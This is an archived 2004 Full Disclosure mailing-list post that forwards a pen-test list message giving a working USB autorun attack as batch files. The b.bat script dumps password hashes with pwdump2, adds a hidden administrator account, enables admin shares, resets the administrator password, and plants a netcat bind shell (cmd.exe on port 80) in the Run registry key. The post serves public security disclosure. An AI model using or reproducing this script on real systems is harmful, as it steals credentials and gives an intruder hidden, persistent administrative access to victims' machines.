Full Disclosure mailing list archives

USB risks - working autorun example (fwd from pen-test)


From: Gadi Evron <ge () egotistical reprehensible net>
Date: Sat, 19 Jun 2004 14:56:16 +0200

Okay, just to put this point at ease, autorun.inf usage on USB drives is possible. My concerns are of a different type, a BOF or a backdoor in an SDK. Even simple usage of USB for different operational criminal needs... Still, if the simplest solution (autorun) works (and it does...)... why over-complicate like we in the security field tend to do?

Attached is a proof-of-concept as made available by mak_pen () hotmail com for using autorun with USB.

This should work. As it was already released, I see nothing wrong with relaying it again (with due credit) here.

I'd strongly suggest to people to read the (different) threads on the subject on the pen-test list, a lot of questions were answered there.

        Gadi Evron.

--
Email: ge () linuxbox org.  Work: gadie () cbs gov il. Backup: ge () warp mx dk.
Phone: +972-50-428610 (Cell).

PGP key for attachments: http://vapid.reprehensible.net/~ge/Gadi_Evron.asc
ID: 0xD9216A06 FP: 5BB0 D3E2 D3C1 19B7 2104  C0D0 A7B3 1CF7 D921 6A06
GPG key for encrypted email: http://vapid.reprehensible.net/~ge/Gadi_Evron_Emails.asc
ID: 0x06C7D450 FP: 3B88 845A DF1F 4062 E5BA  569A A87E 8DB7 06C7 D450
--- Begin Message --- From: <mak_pen () hotmail com>
Date: 3 Jun 2004 15:03:11 -0000
In-Reply-To: <BAY15-F11d7KKQpQq5p00043ca6 () hotmail com>

I have been using this "attack" for some time now. below are the batch files (test.bat, b.bat and autorun.inf. 
autorun.inf calls test.bat)i use:



*********<BOF test.bat>

@echo off

@start /min b.bat /B

@exit

<EOF test.bat>





*********<BOF b.bat>

@explorer .

@echo off



::Displaying Computer Information for my reference

@echo %computername% %username% %date% %time% >> Essential\DumpIt\sam.txt

@Essential\DumpIt\pwdump2 >> Essential\DumpIt\sam.txt



::Adding a user for me :o)

@net user /add __system32__ .z,xmcnvb /fullname:"IPC User" 

@net localgroup Administrators _system32_ /add



::Hide the Account from being shown on the welcome screen

@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v 
"__system__" /t REG_DWORD /d 0 /f



::Enabling Admin Shares

@reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /v @AutoSharewks /t reg_dword /d 
1 /f



::Changing Admin Password

@net user administrator .;[pl,mkoijnbhu



::Backdooring

@copy nc.exe <nc directory>

@cd c:

@cd <nc directory>

@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Taskbr" /d "nc directory\nc.exe -L -d -p 
80 -e cmd.exe" /f



@echo MYUSER: __system32__ .z,xmcnvb >> Essential\DumpIt\sam.txt

@echo Changed Admin Pass: .;[pl,mkoijnbhu >> Essential\DumpIt\sam.txt

@echo ******************************************** >> Essential\DumpIt\sam.txt

@cls

@exit

<EOF b.bat>



I have tried this using a flash memmory  and it works. what happens is that it opens explorer showing the current 
directory so that it hides any shells that might appear, then it does a series of commands which i have documented 
above.



to prevent against this i have a registry file i use to disable autorun all together. contact me if you need it at: 
mak_pen(at)hotmail(dot)com



Cheers....





Received: (qmail 20035 invoked from network); 2 Jun 2004 22:23:41 -0000

Received: from outgoing.securityfocus.com (HELO outgoing2.securityfocus.com) (205.206.231.26)

 by mail.securityfocus.com with SMTP; 2 Jun 2004 22:23:41 -0000

Received: from lists.securityfocus.com (lists.securityfocus.com [205.206.231.19])

      by outgoing2.securityfocus.com (Postfix) with QMQP

      id 62E8414370A; Thu,  3 Jun 2004 00:26:35 -0600 (MDT)

Mailing-List: contact pen-test-help () securityfocus com; run by ezmlm

Precedence: bulk

List-Id: <pen-test.list-id.securityfocus.com>

List-Post: <mailto:pen-test () securityfocus com>

List-Help: <mailto:pen-test-help () securityfocus com>

List-Unsubscribe: <mailto:pen-test-unsubscribe () securityfocus com>

List-Subscribe: <mailto:pen-test-subscribe () securityfocus com>

Delivered-To: mailing list pen-test () securityfocus com

Delivered-To: moderator for pen-test () securityfocus com

Received: (qmail 27926 invoked from network); 2 Jun 2004 19:49:38 -0000

X-Originating-IP: [66.130.148.65]

X-Originating-Email: [mindedsmasher () hotmail com]

X-Sender: mindedsmasher () hotmail com

From: "Fred Gravel" <mindedsmasher () hotmail com>

To: pen-test () securityfocus com

Subject: Re: USB delivered attacks

Date: Wed, 02 Jun 2004 20:02:14 +0000

Mime-Version: 1.0

Content-Type: text/plain; format=flowed

Message-ID: <BAY15-F11d7KKQpQq5p00043ca6 () hotmail com>

X-OriginalArrivalTime: 02 Jun 2004 20:02:14.0500 (UTC) FILETIME=[7FA8F240:01C448DC]



And after some search ... autorun is possible on a usb storage device... as 

it explained just below ...



http://www.microsoft.com/whdc/device/storage/usbfaq.mspx

Q: What must I do to trigger Autorun on my USB storage device?

If you need to make a USB storage device that executes Autorun, the 

following two conditions must both be true:

?



Media must be marked as removable.

?



The device can be set to either static or removable.



We associate the "removable" nature of a device with the bus that it resides 

on. This means that a disk on an Integrated Device Electronics (IDE) or SCSI 

bus would be considered fixed, whereas a disk on a USB or IEEE 1394 bus 

would be regarded as removable by default. PnP uses a bit in the 

DEVICE_CAPABILITIES structure to determine this. For more information, see 

the DEVICE_CAPABILITIES Plug and Play Structure in the Windows DDK, located 

at 

http://msdn.microsoft.com/library/default.asp?url=/library/en-us/kmarch/hh/kmarch/k112_22r6.asp.



The "removable" nature of media is a property of the device. For example, in 

the case of a CD-ROM or a ZIP drive, the medium can be removed without the 

device itself going away, but on the other hand the medium and the disk 

cannot be separated on static storage PC cards. We obtain this information 

by using the StorageDeviceProperty request. For more information, see the 

STORAGE_DEVICE_DESCRIPTOR Storage Structure in the Windows DDK, located at 

http://msdn.microsoft.com/library/en-us/storage/hh/storage/k306_00qa.asp.





----

Also the autorun could be used in "cooperation" of the desktop.ini file 

included in the folder(s) on the usb storage device if needed...



_________________________________________________________________

MSN Toolbar provides one-click access to Hotmail from any Web page ? FREE 

download! http://toolbar.msn.click-url.com/go/onm00200413ave/direct/01/








--- End Message ---

Current thread: